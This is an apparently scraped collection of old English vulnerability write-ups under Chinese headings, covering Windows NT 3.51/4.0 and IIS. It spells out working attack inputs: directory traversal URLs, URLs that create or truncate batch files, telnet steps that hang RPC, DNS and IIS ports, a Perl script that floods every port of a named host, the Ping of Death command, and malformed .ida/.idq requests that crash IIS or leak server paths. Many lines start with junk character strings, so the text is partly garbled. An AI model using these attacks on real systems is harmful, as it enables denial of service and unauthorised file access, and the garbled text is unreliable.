NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
% n( u9 g/ _2 [1 \: |A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
& I1 k$ g2 F; l0 B+ x& j
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

$ Q2 o/ `* O* e. z2 a& _; @By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

) C- ?3 q# l* C1 u! c--------------------------------------------------------------------
' a- h  J' |* b9 T- e2 g
/ ?  }9 e. D3 C7 f2 Z受影響系統(tǒng):4.0
, S- J$ x! ?, RA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
# B$ r) m! d$ i3 \) q+ M
If the file 'target.bat' exists, the file will be truncated.

* @5 Y- l) \& d
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
2 J( g; f5 M$ k5 s( T! X
----------------------------------------------------------------------
1 v: w' w/ k3 ]" z% H
受影響系統(tǒng):3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.

; b8 |' S& |6 @+ ~The following steps;

/ s2 m7 \; j0 e5 ITelnet to an NT 4.0 system on port 135
9 T" g5 p$ F& a: {1 N- O/ f6 o  j2 uType about 10 characters followed by a <CR>
Exit Telnet
: k7 z! q! A$ t( {' E. rresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
2 d6 {6 R0 V7 T) l  ^. f! Y
9 l" }% A( S9 A  ~8 u( h3 RWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
6 m3 _# _+ ?* p4 ^, e- j) c
, o3 w% V+ C- \; y/ h! D5 n: gThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
0 N/ h: q0 W; S) l; l* H$ }/ `
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
& q2 a9 c$ s6 C# A1 W0 A
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

) N# X' F# ^* ]' p4 d/*begin poke code*/
- \" e5 b: c$ Z+ L) p
use Socket;
7 W9 y! r+ X4 n7 s! L& g$ ^1 Duse FileHandle;
3 Y6 a: {5 F  G/ z9 }; i/ W# Vrequire "chat2.pl";
' n# T6 w. i$ b' v2 J& y1 L) z1 g
* J& G0 Y- d: f$ B& G  P$systemname = $ARGV[0] && shift;
/ C% G5 o- I5 ]. F7 t
' X* h1 o+ n: X$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
6 q, }6 O. I4 {9 h0 `7 F" n2 m0 _0 y{
+ C7 O8 I. G7 w& o

/ w. i. A1 }3 z6 b* L- Kif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
1 h" e( n9 g5 dnext;
}
' s) O1 `2 `( n3 I* N; f5 Z8 D* K$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
+ Q7 l1 o: z3 iif ($verbose) {
print "Trying port: $port\n";
; H7 H( F' N; [  |- p}
# Y. C! P' b. n3 i  Ochat::close($fh);

}

/ n. o" }" Y: D! M# S7 b; T
/*end poke code*/

* G1 O. p/ L, s+ MSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

受影響系統(tǒng):4.0
5 p  e8 }  m+ {5 P/ ZUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
' z7 K( Y, l5 c- l+ o% R
This attack causes Dr. Watson to display an alert window and to log an error:
8 C1 O6 |8 k2 `
0 Z7 z  U2 j; P4 @  f6 \' [+ V! V"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
0 B8 q! e. _+ c* Q& W& C
--------------------------------------------------------------------------------
" N/ @* h* Y4 n) S8 n( A3 W) K
受影響系統(tǒng):3.51,4.0
. d: p7 S6 K: A" a- g- q" N8 ]Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
1 |& J( P" i# B
STOP: 0X0000001E
' X/ i2 t8 c+ Z0 S4 R5 HKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

( U% h: ~: Z8 a$ m0 D; W0 K-OR-

; u% F+ A) ]. y1 BSTOP: 0x0000000A
9 U  Y: D7 L, S# \IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
2 M, j0 c  G2 R$ O! O  \: x! D8 v2 ?
1 g' h0 V4 o2 l6 E" i0 O--------------------------------------------------------------------------------
0 p9 s# \  x- |' C  b5 j0 L
" r5 q& u3 [0 R1 Z% t# J" VMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
  C) h; X+ G! F) I* ?
/ L; A1 z% h* mIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server